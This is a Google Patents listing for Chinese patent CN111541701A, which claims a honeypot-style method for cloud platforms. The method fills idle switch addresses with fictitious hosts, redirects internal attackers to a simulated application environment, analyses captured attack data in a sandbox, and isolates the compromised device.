CN111541701A - Attack trapping method, device, equipment and computer readable storage medium - Google Patents
Attack trapping method, device, equipment and computer readable storage medium Download PDFInfo
- Publication number
- CN111541701A CN111541701A CN202010336360.4A CN202010336360A CN111541701A CN 111541701 A CN111541701 A CN 111541701A CN 202010336360 A CN202010336360 A CN 202010336360A CN 111541701 A CN111541701 A CN 111541701A
- Authority
- CN
- China
- Prior art keywords
- attack
- trapping
- attacker
- address information
- cloud platform
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1491—Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1416—Event detection, e.g. attack signature detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/20—Network architectures or network communication protocols for network security for managing network security; network security policies in general
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
- Computer And Data Communications (AREA)
Abstract
The invention discloses an attack trapping method, an attack trapping device, equipment and a computer readable storage medium, wherein the attack trapping method comprises the following steps: determining address information in the aggregation switch; determining idle target address information in the address information based on the address information in the aggregation switch, and configuring the target address information into address information of a fictitious host, wherein the fictitious host belongs to the trapping network system; when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to the trapping network system to trap the attacker. The invention solves the technical problem that the network attack initiated from the internal equipment of the cloud platform is difficult to discover by the existing cloud platform network security solution.
Description
Technical Field
The present invention relates to the field of network security technologies, and in particular, to an attack trapping method, apparatus, device, and computer-readable storage medium.
Background
The cloud platform is also called a cloud computing platform, and is a service based on hardware resources and software resources, and provides computing, network and storage capabilities. Cloud computing platforms can be divided into 3 classes: the cloud platform comprises a storage type cloud platform mainly based on data storage, a computing type cloud platform mainly based on data processing and a comprehensive cloud computing platform considering both computing and data storage processing, but because massive data with high importance degree exist in equipment of the cloud platform, the equipment of the cloud platform is more easily attacked by a network and is seriously attacked, the current safety situation of the equipment of the cloud platform is worried, and therefore the cloud platform needs to pay attention to safety construction.
The existing cloud platform network security solution is similar to the traditional enterprise level network security device, and network security detection and filtering devices are connected in series at the gateway position of a target protection system to guarantee the security of the internal devices of the cloud platform, mainly aiming at DDOS defense, Intrusion Prevention (IPS), network anti-virus (AV), webpage filtering, attack protection and the like of an external network, but the architecture is difficult to discover and prevent network attacks initiated from other channels or the internal devices of the cloud platform.
The above is only for the purpose of assisting understanding of the technical aspects of the present invention, and does not represent an admission that the above is prior art.
Disclosure of Invention
The invention mainly aims to provide an attack trapping method, an attack trapping device, attack trapping equipment and a computer readable storage medium, and aims to solve the technical problem that the existing cloud platform network security solution is difficult to discover network attacks initiated from internal equipment of a cloud platform.
In order to achieve the above object, the present invention provides an attack trapping method, which is applied to a trapping network system, where the trapping network system accesses a cloud platform device through a convergence switch, and the attack trapping method includes the following steps:
determining address information in the aggregation switch;
determining idle target address information in the address information based on the address information in the aggregation switch, and configuring the target address information into address information of a fictitious host, wherein the fictitious host belongs to the trapping network system;
when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to the trapping network system to trap the attacker.
Optionally, the step of directing an attack behavior generated by an attacker to the trapping network system when the attacker in the cloud platform device attacks the fictitious host based on the target address information further includes, after the step of trapping the attacker:
determining the position of the attacker in the cloud platform equipment so as to determine target equipment corresponding to the attacker in the cloud platform equipment;
isolating the target device.
Optionally, when an attacker in the cloud platform device attacks the fictitious host based on the target address information, the step of directing attack behavior generated by the attacker to the trapping network system includes:
when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to an application simulation system in the trapping network system so that the attacker attacks the application simulation system, and the application simulation system collects attack data generated when the attacker attacks the application simulation system.
Optionally, the persistent threat analysis system of the trapping network system receives attack data sent by the application simulation system, analyzes the attack data, and generates a data report corresponding to the attack data to record relevant attack information of the attacker.
Optionally, the persistent threat analysis system of the trapping network system receives attack data sent by the application simulation system, analyzes the attack data, generates alarm information, and outputs the alarm information.
Optionally, the persistent threat analysis system analyzes the attack data, and if suspicious data is detected to exist in the attack data, the suspicious data is sent to a sandbox of the trapping network system, so that the sandbox analyzes the suspicious data.
Optionally, the suspicious data includes suspicious code, and the sandbox receives the suspicious code sent by the persistent threat analysis system and executes the suspicious code to determine a degree of harm of the suspicious code.
Further, to achieve the above object, the present invention also provides an attack trapping apparatus comprising:
a determining module, configured to determine address information in the aggregation switch;
a configuration module, configured to determine, based on address information in the aggregation switch, idle target address information in the address information, and configure the target address information as address information of a fictitious host, where the fictitious host belongs to the trapping network system;
and the trapping module is used for directing the attack behavior generated by the attacker to the trapping network system and trapping the attacker when the attacker in the cloud platform equipment attacks the fictive host based on the target address information.
Further, to achieve the above object, the present invention also provides an attack trapping apparatus comprising: a memory, a processor and an attack trapping program stored on said memory and operable on said processor, said attack trapping program when executed by said processor implementing the steps of the attack trapping method as described above.
Furthermore, to achieve the above object, the present invention also provides a computer-readable storage medium having stored thereon an attack trapping program, which when executed by a processor, implements the steps of the attack trapping method as described above.
The invention determines the address information in the convergence switch; determining idle target address information in the address information based on the address information in the aggregation switch, and configuring the target address information into address information of a fictitious host, wherein the fictitious host belongs to the trapping network system; when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to the trapping network system to trap the attacker. In this embodiment, the idle address information in the aggregation switch is configured to be the address information of the fictitious host, and the address information in the aggregation switch can be fully utilized, so that the trapping network system traps an attacker more probably and more quickly, and the cloud platform device is protected more effectively; when the host attacked by the attacker belongs to the fictitious host, the trapping network system directs the attacker to the trapping network system to attract the attacker to attack the trapping network system, so that the trapping network system can capture the attacker hidden in the cloud platform equipment, the attacker from the cloud platform internal equipment or the network attack initiated in the cloud platform can be discovered, and the technical problem that the network attack initiated from the cloud platform internal equipment is difficult to discover by the existing cloud platform network security solution is solved.
Drawings
FIG. 1 is a schematic structural diagram of an attack trapping device of a hardware operating environment according to an embodiment of the present invention;
FIG. 2 is a schematic flow chart of a first embodiment of the attack trapping method according to the present invention;
fig. 3 is a schematic diagram of a trapping network system to which the attack trapping method of the present invention is applied.
The implementation, functional features and advantages of the objects of the present invention will be further explained with reference to the accompanying drawings.
Detailed Description
It should be understood that the specific embodiments described herein are merely illustrative of the invention and are not intended to limit the invention.
Fig. 1 is a schematic structural diagram of an attack trapping apparatus in a hardware operating environment according to an embodiment of the present invention.
The terminal of the embodiment of the invention can be a PC, and can also be a mobile terminal device with a display function, such as a smart phone, a tablet computer, an electronic book reader, a portable computer and the like.
As shown in fig. 1, the attack trapping apparatus may include: a processor 1001, such as a CPU, a network interface 1004, a user interface 1003, a memory 1005, a communication bus 1002. Wherein a communication bus 1002 is used to enable connective communication between these components. The user interface 1003 may include a Display screen (Display), an input unit such as a Keyboard (Keyboard), and the optional user interface 1003 may also include a standard wired interface, a wireless interface. The network interface 1004 may optionally include a standard wired interface, a wireless interface (e.g., WI-FI interface). The memory 1005 may be a high-speed RAM memory or a non-volatile memory (e.g., a magnetic disk memory). The memory 1005 may alternatively be a storage device separate from the processor 1001.
Optionally, the attack trapping device may further include a camera, a Radio Frequency (RF) circuit, a sensor, an audio circuit, a WiFi module, and the like.
It will be appreciated by those skilled in the art that the attack trap configuration shown in fig. 1 does not constitute a limitation of the attack trap and may include more or fewer components than shown, or some components in combination, or a different arrangement of components.
As shown in fig. 1, a memory 1005, which is a kind of computer storage medium, may include therein an operating system, a network communication module, a user interface module, and an attack trap program.
In the attack trapping apparatus shown in fig. 1, the network interface 1004 is mainly used for connecting to a background server and performing data communication with the background server; the user interface 1003 is mainly used for connecting a client (user side) and performing data communication with the client; and processor 1001 may be used to call an attack trap program stored in memory 1005.
In this embodiment, the attack trapping apparatus includes: a memory 1005, a processor 1001, and an attack trap program stored on said memory 1005 and executable on said processor 1001, wherein, when the processor 1001 calls the attack trap program stored in the memory 1005, the following operations are performed:
determining address information in the aggregation switch;
determining idle target address information in the address information based on the address information in the aggregation switch, and configuring the target address information into address information of a fictitious host, wherein the fictitious host belongs to the trapping network system;
when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to the trapping network system to trap the attacker.
Further, processor 1001 may call an attack trap program stored in memory 1005, and also perform the following operations:
determining the position of the attacker in the cloud platform equipment so as to determine target equipment corresponding to the attacker in the cloud platform equipment;
isolating the target device.
Further, processor 1001 may call an attack trap program stored in memory 1005, and also perform the following operations:
when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to an application simulation system in the trapping network system so that the attacker attacks the application simulation system, and the application simulation system collects attack data generated when the attacker attacks the application simulation system.
Further, processor 1001 may call an attack trap program stored in memory 1005, and also perform the following operations:
and analyzing the attack data, and generating a data report corresponding to the attack data so as to record the relevant attack information of the attacker.
Further, processor 1001 may call an attack trap program stored in memory 1005, and also perform the following operations:
and analyzing the attack data, generating alarm information and outputting the alarm information.
Further, processor 1001 may call an attack trap program stored in memory 1005, and also perform the following operations:
and analyzing the attack data, and if suspicious data is detected to exist in the attack data, sending the suspicious data to a sandbox of the trapping network system so that the sandbox can analyze the suspicious data.
Further, processor 1001 may call an attack trap program stored in memory 1005, and also perform the following operations:
executing the suspect code to determine a level of harm of the suspect code.
The invention also provides an attack trapping method, and referring to fig. 2, fig. 2 is a schematic flow chart of a first embodiment of the attack trapping method.
The attack trapping method provided by the invention is applied to a trapping network system, which can also be called as a trapping network active protection detection system, and is used for actively detecting, trapping and protecting attackers from internal equipment of a cloud platform or other channels, wherein the trapping network system is accessed to the cloud platform equipment through a convergence switch, as shown in a schematic diagram of the trapping network system shown in fig. 3, the trapping network system comprises an active network trapper, a continuous threat analysis system, an application simulation system and a sandbox.
The active network trap is a system which takes an FPGA as a core and is externally connected with a CPU for control. The active network trapper flexibly releases a large number of fictitious hosts in each subnet section of the network through an ARP spoofing technology, the fictitious hosts have own address information and are set to open various different ports to respond to various network scanning and sniffing requests, and the address information comprises MAC addresses and IP addresses.
When an intruding attacker accesses the address information of the fictitious host, the network trapper directs the attacker to the application simulation system of the trapping network system through an address conversion technology, so that the access flow of the attacker to the fictitious host can be redirected to the application simulation system in the trapping network system, meanwhile, attack data are generated and sent to the continuous threat analysis system, the continuous threat analysis system analyzes the attack data, the attacker can be a network attack object such as a virus or a trojan horse, and the attack data comprise a network session log and mirror image data.
The application simulation system is a host provided with a real operating system and application, can be a real cloud host or a system host or a virtual cloud host which completely simulates other services of the cloud platform, provides a real environment for an attacker, so that the attacker can smoothly attack the application simulation system, and in the application simulation system, when the attacker attacks the application simulation system, all attack behaviors of the attacker can be recorded by the application simulation system and are unidirectionally sent to the continuous threat analysis system, so that the continuous analysis system can analyze the attack behaviors of the attacker. The application simulation system can be one or more PCs or industrial personal computers; in the cloud platform, one or more virtual cloud hosts can be provided.
The continuous threat analysis system is used for analyzing attack data sent by the network trapper and the application simulation system, generating a data report and alarm information, and sending suspicious information captured in the attack data to the sandbox so that the sandbox can analyze the suspicious information. Wherein, the continuous threat analysis system can be a PC or an industrial personal computer; at the cloud platform, the persistent threat analysis system may be a virtual cloud host.
And analyzing the suspicious information in the sandbox, for example, when the suspicious information is the suspicious code, executing the suspicious code, observing the response in the sandbox after the suspicious code is executed, obtaining an analysis result, judging whether the attacker belongs to an attacker with high harm degree, such as Trojan horse virus, obtaining the harm degree of the attack behavior generated by the attacker, and sending the analysis result back to the continuous threat analysis system so as to generate a log or alarm.
In this embodiment, the attack trapping method includes the following steps:
step S10, determining address information in the aggregation switch;
in one embodiment, the captive network system accesses the protected network through the network interface to communicate data with the real network device, e.g., the captive network system accesses the aggregation switch through the network interface to access the protected network through the aggregation switch. The trapping network system is accessed to the cloud platform device through the aggregation switch, the aggregation switch contains all available address information in the network, and the address information comprises relevant address information of all network segments or sub-network segments, including but not limited to MAC addresses, IP addresses and the like. Therefore, all available address information is recorded in the aggregation switch, including all address information occupied by the cloud platform device and unoccupied address information, which is idle address information in all available address information in the aggregation switch. Specifically, the trapping network system accesses the aggregation switch through a data transmission channel established between the trapping network system and the aggregation switch, and determines all address information in the aggregation switch. Furthermore, the trapping network system comprises an active network trap, and the trapping network system accesses the aggregation switch through a data transmission channel established between the active network trap and the aggregation switch to determine all address information in the aggregation switch.
Furthermore, the address information in the aggregation switch can be determined by acquiring the address information configured in the trapping network system, and the address information in the aggregation switch can be acquired by the trapping network system self-learning the address information in the aggregation switch.
Step S20, based on the address information in the aggregation switch, determining the idle target address information in the address information, and configuring the target address information into the address information of a fictitious host, wherein the fictitious host belongs to the trapping network system;
in an embodiment, the address information in the aggregation switch includes all address information occupied by the cloud platform device and unoccupied idle address information, the trapping network system acquires the idle address information in real time from all the address information included in the aggregation switch, uses the idle address information as target address information, and configures the target address information into address information of a fictitious host in the trapping network system, so as to configure the idle address information in the aggregation switch into the address information of the fictitious host in real time. The purpose of configuring the idle address information in the aggregation switch into the address information of the fictitious host is to fully utilize the address information in the aggregation switch, so that the trapping network system traps the attacker with a higher probability, and the cloud platform equipment is protected more effectively.
Further, the trapping network system acquires the idle address information from all the address information contained in the aggregation switch in real time through the active network trapper, takes the idle address information as target address information, configures the target address information into the address information of the fictitious host in the trapping network system, and configures the idle address information in the aggregation switch into the address information of the fictitious host in real time. The active network trapper configures the idle address information in the aggregation switch into the address information of the fictitious hosts through an ARP spoofing technology, thereby flexibly releasing a large number of fictitious hosts in each subnet segment of the network, wherein the fictitious hosts have own address information and are set to open various different ports to respond to various network scanning and sniffing requests.
Step S30, when an attacker in the cloud platform device attacks the fictive host based on the target address information, the attacker directs the attack behavior generated by the attacker to the trapping network system to trap the attacker.
In an embodiment, when an attacker in the cloud platform device attacks the fictitious host, the attacker acquires any one of the target address information in the network and attacks the fictitious host pointed by the target address information. When the host attacked by the attacker belongs to the fictitious host, the network trapper in the trapping network system directs the attacker to the application simulation system in the trapping network system through an address translation technology to attract the attacker to attack the application simulation system in the trapping network system, so that the trapping network system can capture the attacker hidden in the cloud platform equipment.
Further, when the network trapper in the trapping network system directs the attacker to the application simulation system in the trapping network system, the access flow of the attacker to the fictive host can be redirected to the application simulation system in the trapping network system, so that the application simulation system in the trapping network system captures the attack behavior of the attacker, and simultaneously generates attack data and sends the attack data to the persistent threat analysis system so that the persistent threat analysis system analyzes the attack data, wherein the attacker can be a network attack object such as a virus or a trojan horse, and the attack data comprises a network session log and mirror image data.
In the attack trapping method provided by this embodiment, the address information in the aggregation switch is determined; then, based on the address information in the aggregation switch, determining idle target address information in the address information, and configuring the target address information into address information of a fictitious host, wherein the fictitious host belongs to the trapping network system; finally, when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to the trapping network system to trap the attacker. In this embodiment, the idle address information in the aggregation switch is configured to be the address information of the fictitious host, and the address information in the aggregation switch can be fully utilized, so that the trapping network system traps an attacker more probably and more quickly, and the cloud platform device is protected more effectively; when the host attacked by the attacker belongs to the fictitious host, the trapping network system directs the attacker to the trapping network system to attract the attacker to attack the trapping network system, so that the trapping network system can capture the attacker hidden in the cloud platform equipment, the attacker from the cloud platform internal equipment or the network attack initiated in the cloud platform can be discovered, and the technical problem that the network attack initiated from the cloud platform internal equipment is difficult to discover by the existing cloud platform network security solution is solved.
Based on the first embodiment, a second embodiment of the method of the present invention is provided, where after step S30, the method further includes:
step a, determining the position of the attacker in the cloud platform equipment so as to determine target equipment corresponding to the attacker in the cloud platform equipment;
and b, isolating the target equipment.
In one embodiment, when the host attacked by the attacker belongs to the fictitious host, the trapping network system directs the attacker to the trapping network system so as to lure the attacker to attack the trapping network system. When an attacker attacks the trapping network system, the attacker sends an attack packet to the trapping network system to attack the trapping network system based on the attack packet, the trapping network system receives the attack packet sent by the attacker, analyzes the attack packet to obtain address information in the attack packet, obtains the address information of the attacker, further obtains the position of the attacker in the cloud platform device, and determines target equipment hidden in the cloud platform device by the attacker, wherein the attack packet comprises the address information of the attacker. After the position of the attacker is determined, the position information of the attacker is sent to a management system of the cloud platform equipment to inform the management system of the cloud platform equipment to determine target equipment based on the position information of the attacker, and the target equipment is isolated from other cloud platform equipment, for example, the network connection of the target equipment is disconnected, so that the attacker hidden in the target equipment is prevented from carrying out network attack on other equipment.
Further, in an embodiment, the step of directing attack behavior generated by an attacker to the trapping network system when the attacker in the cloud platform device attacks the fictive host based on the target address information includes:
step c, when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to an application simulation system in the trapping network system so that the attacker attacks the application simulation system, and the application simulation system collects attack data generated when the attacker attacks the application simulation system.
In an embodiment, when an attacker in the cloud platform device attacks the fictitious host, the attacker acquires any one of the target address information in the network and attacks the fictitious host pointed by the target address information. When the host attacked by the attacker belongs to the fictitious host, the network trapper in the trapping network system directs the attacker to the application simulation system in the trapping network system through an address translation technology to attract the attacker to attack the application simulation system in the trapping network system, so that the trapping network system can capture the attacker hidden in the cloud platform equipment.
And the network trapper in the trapping network system directs the attacker to the application simulation system in the trapping network system, so that the attacker attacks the application simulation system. The application simulation system monitors the kernel process of the application simulation system in real time, and when an attacker attacks the application simulation system, the application simulation system collects attack data generated when the attacker attacks the application simulation system. Meanwhile, the application simulation system sends the attack data to the persistent threat analysis system so that the persistent threat analysis system can analyze the attack data, wherein an attacker can be a virus or a trojan and other network attack objects, and the attack data comprises a network session log, suspicious files and the like.
Further, in an embodiment, the persistent threat analysis system of the trapping network system receives attack data sent by the application simulation system, analyzes the attack data, and generates a data report corresponding to the attack data to record relevant attack information of the attacker.
In one embodiment, the application simulation system sends the attack data to a persistent threat analysis system in the trapping network system, the persistent threat analysis system receives the attack data sent by the application simulation system, analyzes the attack data to obtain an analysis result, and stores the analysis result in a data report to record relevant attack information of an attacker attacking the application simulation system. The relevant attack information includes, but is not limited to, location information of an attacker, an attack type, an attack process, an attack stage, an attack purpose, a risk degree, and the like, and the relevant attack information is not limited in this embodiment.
Further, in an embodiment, the persistent threat analysis system of the trapping network system receives attack data sent by the application simulation system, analyzes the attack data, generates alarm information, and outputs the alarm information.
In one embodiment, the application simulation system sends the attack data to a persistent threat analysis system in the trapping network system, the persistent threat analysis system receives the attack data sent by the application simulation system and analyzes the attack data to obtain an analysis result, and the analysis result is stored in a data report to record relevant attack information of an attacker attacking the application simulation system. Meanwhile, the continuous threat analysis system generates alarm information and sends the alarm information to the cloud platform equipment to inform the cloud platform of defense or detect each cloud platform equipment, for example, the state of each cloud platform equipment is detected to determine whether the cloud platform equipment is attacked or not.
Further, in an embodiment, the persistent threat analysis system analyzes the attack data, and if suspicious data is detected to exist in the attack data, the suspicious data is sent to a sandbox of the trapping network system, so that the sandbox analyzes the suspicious data.
In one embodiment, the persistent threat analysis system receives attack data sent by the application simulation system, analyzes the attack data, and sends suspicious information captured in the attack data to the sandbox, so that the sandbox can analyze the suspicious information.
Further, when the active network trapper sends attack data to the persistent threat analysis system, the persistent threat analysis system may further receive the attack data from the active network trapper, analyze the attack data from the active network trapper, so that the persistent threat analysis system sends suspicious information captured in the attack data to the sandbox, and the sandbox analyzes the suspicious information.
Therefore, the persistent threat analysis system can analyze the attack data sent by the network trapper and the application simulation system and send the suspicious information captured in the attack data to the sandbox so that the sandbox can analyze the suspicious information.
Further, in an embodiment, the suspicious data includes suspicious code, and the sandbox receives the suspicious code sent by the persistent threat analysis system and executes the suspicious code to determine a degree of harm of the suspicious code.
In one embodiment, the suspicious information is analyzed in the sandbox, for example, the suspicious code is executed when the suspicious information is the suspicious code, the response in the sandbox after the suspicious code is executed is observed, the analysis result is obtained, whether the attacker belongs to an attacker with high harm degree such as Trojan horse virus or not can be judged, the harm degree of the attack behavior generated by the attacker can be obtained, and the analysis result is sent back to the persistent threat analysis system so as to generate a log or an alarm.
In the attack trapping method provided by this embodiment, the target device corresponding to the attacker in the cloud platform device is determined by determining the position of the attacker in the cloud platform device; the target device is then isolated. In this embodiment, when the host attacked by the attacker belongs to the fictitious host, the trapping network system directs the attacker to the trapping network system, attracts the attacker to attack the trapping network system, obtains the address information of the attacker, obtains the position in the cloud platform device, enables the trapping network system to capture the attacker hidden in the cloud platform device, and isolates the target device where the attacker is located from other cloud platform devices, so that the attacker originating from the cloud platform internal device or the network attack initiated inside the cloud platform can be prevented, and the technical problem that the existing cloud platform network security solution is difficult to discover and prevent the network attack initiated from the cloud platform internal device is solved.
In addition, an embodiment of the present invention further provides an attack trapping device, where the attack trapping device includes:
a determining module, configured to determine address information in the aggregation switch;
a configuration module, configured to determine, based on address information in the aggregation switch, idle target address information in the address information, and configure the target address information as address information of a fictitious host, where the fictitious host belongs to the trapping network system;
and the trapping module is used for directing the attack behavior generated by the attacker to the trapping network system and trapping the attacker when the attacker in the cloud platform equipment attacks the fictive host based on the target address information.
Determining the position of the attacker in the cloud platform equipment so as to determine target equipment corresponding to the attacker in the cloud platform equipment;
isolating the target device.
Further, the trap module is further configured to:
when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to an application simulation system in the trapping network system so that the attacker attacks the application simulation system, and the application simulation system collects attack data generated when the attacker attacks the application simulation system.
Further, the trap module is further configured to:
and receiving attack data sent by the application simulation system, analyzing the attack data, and generating a data report corresponding to the attack data so as to record relevant attack information of the attacker.
Further, the trap module is further configured to:
and receiving attack data sent by the application simulation system, analyzing the attack data, generating alarm information, and outputting the alarm information.
Further, the trap module is further configured to:
and analyzing the attack data, and if suspicious data is detected to exist in the attack data, sending the suspicious data to a sandbox of the trapping network system so that the sandbox can analyze the suspicious data.
Further, the trap module is further configured to:
and receiving suspicious codes sent by the continuous threat analysis system, and executing the suspicious codes to determine the degree of harm of the suspicious codes.
Furthermore, an embodiment of the present invention further provides a computer-readable storage medium, on which an attack trapping program is stored, where the attack trapping program, when executed by a processor, implements the steps of the attack trapping method according to any one of the above.
The specific embodiment of the computer-readable storage medium of the present invention is substantially the same as the embodiments of the attack trapping method described above, and will not be described in detail herein.
It should be noted that, in this document, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or system that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or system. Without further limitation, an element defined by the phrase "comprising an … …" does not exclude the presence of other like elements in a process, method, article, or system that comprises the element.
The above-mentioned serial numbers of the embodiments of the present invention are merely for description and do not represent the merits of the embodiments.
Through the above description of the embodiments, those skilled in the art will clearly understand that the method of the above embodiments can be implemented by software plus a necessary general hardware platform, and certainly can also be implemented by hardware, but in many cases, the former is a better implementation manner. Based on such understanding, the technical solution of the present invention may be embodied in the form of a software product, which is stored in a storage medium (e.g., ROM/RAM, magnetic disk, optical disk) as described above and includes instructions for enabling a terminal device (e.g., a computer, a server, or a network device) to execute the method according to the embodiments of the present invention.
The above description is only a preferred embodiment of the present invention, and not intended to limit the scope of the present invention, and all modifications of equivalent structures and equivalent processes, which are made by using the contents of the present specification and the accompanying drawings, or directly or indirectly applied to other related technical fields, are included in the scope of the present invention.
Claims (10)
1. An attack trapping method is applied to a trapping network system, the trapping network system accesses a cloud platform device through a convergence switch, and the attack trapping method comprises the following steps:
determining address information in the aggregation switch;
determining idle target address information in the address information based on the address information in the aggregation switch, and configuring the target address information into address information of a fictitious host, wherein the fictitious host belongs to the trapping network system;
when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to the trapping network system to trap the attacker.
2. The attack trapping method according to claim 1, wherein when an attacker in the cloud platform device attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to the trapping network system, and the step of trapping the attacker further comprises:
determining the position of the attacker in the cloud platform equipment so as to determine target equipment corresponding to the attacker in the cloud platform equipment;
isolating the target device.
3. The attack trapping method according to claim 1, wherein the step of directing attack behavior by an attacker to the trapping network system when the attacker in the cloud platform device attacks the fictitious host based on the target address information comprises:
when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to an application simulation system in the trapping network system so that the attacker attacks the application simulation system, and the application simulation system collects attack data generated when the attacker attacks the application simulation system.
4. An attack trapping method according to claim 3, wherein the persistent threat analysis system of the trapping network system receives the attack data sent by the application simulation system, analyzes the attack data, and generates a data report corresponding to the attack data to record the relevant attack information of the attacker.
5. An attack trapping method according to claim 3, wherein a persistent threat analysis system of said trapping network system receives attack data sent by said application simulation system, analyzes said attack data, generates alarm information, and outputs said alarm information.
6. An attack trapping method according to claim 4 or 5, wherein the persistent threat analysis system analyzes the attack data, and if suspicious data is detected to exist in the attack data, the suspicious data is sent to a sandbox of the trapping network system for the sandbox to analyze the suspicious data.
7. An attack trapping method according to claim 6, wherein the suspicious data comprises suspicious code, the sandbox receives the suspicious code sent by the persistent threat analysis system and executes the suspicious code to determine the degree of harm of the suspicious code.
8. An attack trapping device, characterized in that it comprises:
a determining module, configured to determine address information in the aggregation switch;
a configuration module, configured to determine, based on address information in the aggregation switch, idle target address information in the address information, and configure the target address information as address information of a fictitious host, where the fictitious host belongs to the trapping network system;
and the trapping module is used for directing the attack behavior generated by the attacker to the trapping network system and trapping the attacker when the attacker in the cloud platform equipment attacks the fictive host based on the target address information.
9. An attack trapping device, characterized in that it comprises: memory, a processor and an attack trapping program stored on the memory and executable on the processor, the attack trapping program when executed by the processor implementing the steps of the attack trapping method according to any one of claims 1 to 7.
10. A computer-readable storage medium, characterized in that the computer-readable storage medium has stored thereon an attack trapping program which, when executed by a processor, implements the steps of the attack trapping method according to any one of claims 1 to 7.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202010336360.4A CN111541701B (en) | 2020-04-24 | 2020-04-24 | Attack trapping method, device, equipment and computer readable storage medium |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202010336360.4A CN111541701B (en) | 2020-04-24 | 2020-04-24 | Attack trapping method, device, equipment and computer readable storage medium |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN111541701A true CN111541701A (en) | 2020-08-14 |
| CN111541701B CN111541701B (en) | 2022-07-12 |
Family
ID=71975818
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202010336360.4A Active CN111541701B (en) | 2020-04-24 | 2020-04-24 | Attack trapping method, device, equipment and computer readable storage medium |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN111541701B (en) |
Cited By (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN113965409A (en) * | 2021-11-15 | 2022-01-21 | 北京天融信网络安全技术有限公司 | Network trapping method and device, electronic equipment and storage medium |
| CN114266047A (en) * | 2021-12-14 | 2022-04-01 | 北京天融信网络安全技术有限公司 | Malicious program defense method and device, electronic equipment and storage medium |
Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN103139184A (en) * | 2011-12-02 | 2013-06-05 | 中国电信股份有限公司 | Intelligent network firewall device and network attack protection method |
| CN103581104A (en) * | 2012-07-18 | 2014-02-12 | 江苏中科慧创信息安全技术有限公司 | Active trapping method based on behavior capturing |
| US20170331858A1 (en) * | 2016-05-10 | 2017-11-16 | Quadrant Information Security | Method, system, and apparatus to identify and study advanced threat tactics, techniques and procedures |
-
2020
- 2020-04-24 CN CN202010336360.4A patent/CN111541701B/en active Active
Patent Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN103139184A (en) * | 2011-12-02 | 2013-06-05 | 中国电信股份有限公司 | Intelligent network firewall device and network attack protection method |
| CN103581104A (en) * | 2012-07-18 | 2014-02-12 | 江苏中科慧创信息安全技术有限公司 | Active trapping method based on behavior capturing |
| US20170331858A1 (en) * | 2016-05-10 | 2017-11-16 | Quadrant Information Security | Method, system, and apparatus to identify and study advanced threat tactics, techniques and procedures |
Non-Patent Citations (2)
| Title |
|---|
| 汤雯: "基于诱捕技术的网络安全预警监管平台研究", 《网络空间安全》 * |
| 王瑶等: "基于蜜标和蜜罐的追踪溯源技术研究与实现", 《信息技术》 * |
Cited By (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN113965409A (en) * | 2021-11-15 | 2022-01-21 | 北京天融信网络安全技术有限公司 | Network trapping method and device, electronic equipment and storage medium |
| CN114266047A (en) * | 2021-12-14 | 2022-04-01 | 北京天融信网络安全技术有限公司 | Malicious program defense method and device, electronic equipment and storage medium |
Also Published As
| Publication number | Publication date |
|---|---|
| CN111541701B (en) | 2022-07-12 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
